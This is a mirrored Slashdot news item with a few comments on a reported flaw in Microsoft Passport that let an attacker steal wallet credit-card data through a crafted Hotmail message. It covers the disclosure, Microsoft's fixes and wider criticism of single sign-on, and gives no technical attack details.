Slashdot Mirror

← Back to Stories (view on slashdot.org)

Passport's Pocket Picked

Posted by michael on from the department-of-insecurity dept.

emmons writes: "It looks like there's another hole in MS Passport according to Wired. This one allowing a user to steal another user's Passport Wallet, credit cards and all, by getting them to open a hotmail message. Nice." What happens when someone steals the basket with all your eggs?

3 of 327 comments (clear)

  1. Here is the text of the article... by mnemon1c · · Score: 0, Redundant

    To correct serious security flaws, Microsoft on Friday disabled the virtual wallet function of its Passport service and has begun notifying partners about the vulnerabilities, the company has confirmed.

    The bugs in Passport, a sign-on service used by more than 165 million people, were discovered this week by Marc Slemko, a software developer who lives near Microsoft's Redmond, Washington, headquarters. Slemko is a founding member of the Apache Software Foundation.
    By cobbling together a handful of browser-based bugs with flaws in Passport's authentication system, Slemko developed a technique to steal a person's Microsoft Passport, credit card numbers -- and all, simply by getting the victim to open a Hotmail message.

    The attack raises new questions about the inherent security of Passport, which is being positioned by Microsoft as the lynch pin of its .NET e-commerce service initiative.

    In a demonstration of the exploit earlier this week, Slemko sent Wired News a specially crafted but innocent-looking e-mail. Moments after the e-mail was viewed using Microsoft's Hotmail Web-based e-mail service, Slemko rattled off, over the phone, the credit card number and contact information from the user's Passport wallet.

    According to a notice at the service's site, the Passport wallet enables users to store credit card and address information "in a secure, online location. Only you have access to the information in your .NET Passport wallet."

    Introduced in 1999, Passport is what Microsoft calls a "platform service" and is being pitched to merchants and other partners as a convenient and secure means of determining whether site users are who they claim to be.

    Besides enabling Web surfers to access Hotmail and several other secure sites with a single log-in, Passport includes a wallet system that speeds shoppers' checkout at dozens of sites that deploy the Passport Express Purchase technology.

    In an e-mail today to Slemko, Passport's lead program manager for security and authentication, Chris Peterson, said the wallet service will remain offline until the company can add additional security features "to ensure that similar exploits cannot be used to compromise our user's credit card information."

    Microsoft's Hotmail is the largest service currently utilizing the Passport authentication system, but the technology has also been deployed by eBay to allow users of the online auction service to sign into their accounts.

    In addition, Microsoft's MoneyCentral personal finance site relies on Passport's sign-on technology.

    Prior to being fixed by Microsoft, the authentication flaws discovered by Slemko could enabled an attacker "to do anything as if they were the Passport holder," including editing the user's portfolio at MoneyCentral, or changing user's auctions at eBay, he said.

    More than 70 sites are in the process of deploying Passport's authentication technology, according to Microsoft. Among them is Prudential Banking's Egg.com online bank, which is switching to Passport from an authentication system developed by Entrust Inc., according to published reports.

    Besides posting it at his site, Slemko intends to release the technical details on several security mailing lists Friday "so that, if they choose, users and partners can choose to reduce the impact on themselves," he said. Because of the severity of the flaws, Slemko withheld publication until Microsoft had an opportunity to correct it.
    According to Microsoft, the company has patched two bugs utilized by Slemko's exploit: an HTML filtering issue in Hotmail as well as a cross-site scripting flaw in its Passport server configurations. In addition, the company has modified a software timer so that Passport users must re-enter their password anytime they attempt to access the wallet service.

    While Slemko's exploit, which relied on stealing browser cookies used by Passport, has been rendered inoperable by Microsoft's fixes, the programmer said "deeper issues" remain with the service.

    "Passport's greatest marketing strength -- the single sign-on -- is also its chief technical weakness. It will be fairly trivial for attackers to dream up new ways of exploiting this," he said.

    Slemko is not the first to reach this conclusion. Last year, researchers at AT&T published a paper that observed that Microsoft's single sign-on service "carries significant risks to users" and warned that "Passport must be viewed with suspicion."

    Microsoft subsequently fixed the bugs identified in the AT&T report and issued a response, down-playing the researchers' conclusion that Passport is inherently flawed and promising new security features in the future.

    One fruit of that promise is in Microsoft's recently released Windows XP operating system, which attempts to improve the security of Passport's sign-on system by moving the authentication out of the browser and embedding it into the operating system.

    Microsoft has also adopted what it calls a "federation" model for Passport that will allow other authentication vendors to create systems that interoperate with Microsoft's platform.

    But critics still contend that granting Microsoft control over a massive set of personal data creates intolerable security risks.

    "If history has shown us anything, it's that the best protection lies in decentralizing power and promoting competition. We need to take the same approach to our digital identities and make sure that who and what we are is not held captive by a single entity," wrote Whitfield Diffie, one of the inventors of public-key cryptography, and Susan Landau, a senior staff engineer at Sun Microsystems, in an editorial published last week.

    According to Slemko, the fact that he needed just half an hour to cook up a way to exploit Passport's security flaws indicates that Microsoft is not fit to run a service with Passport's ambitions.

    "It is very clear that either Microsoft does not have sufficient resources in place to properly review the security of their services and software, or that they are aware of the shortcomings but decided that attempting to gain market share was more important than their user's security," he said.

    --
    Ah, the last peanut -- overflowing with the oil and salt of its departed brothers. -Homer
  2. Technology @ Ebay by slugfro · · Score: 0, Redundant

    I know most readers here aren't using hotmail but the article also mentions that the technology has also been deployed [Microsoft Press Release] on Ebay. Thought you might want to know!

    --

    -- Find the Truth...
  3. Embedded cookies in msword documents? by Anonymous Coward · · Score: 1, Redundant

    Sorry, this is offtopic, but it is related to MS and cookies:

    I received a msword doc from a colleague. Since I didn't want to reboot to windows, I tried using a conversion tool (wvHtml) on it, but it crashed. So out of desperation, I ran strings on the doc file. What did I find?

    I found paragraphs of text, of course. However, I also found Netscape format cookies. Some were cookies from potentially sensitive sites, so it seems to me that these cookies shouldn't be in a doc file.

    Is this expected behavior? I am not familiar with the MS Word file format, so I am hoping someone who is can explain.

    Thanks...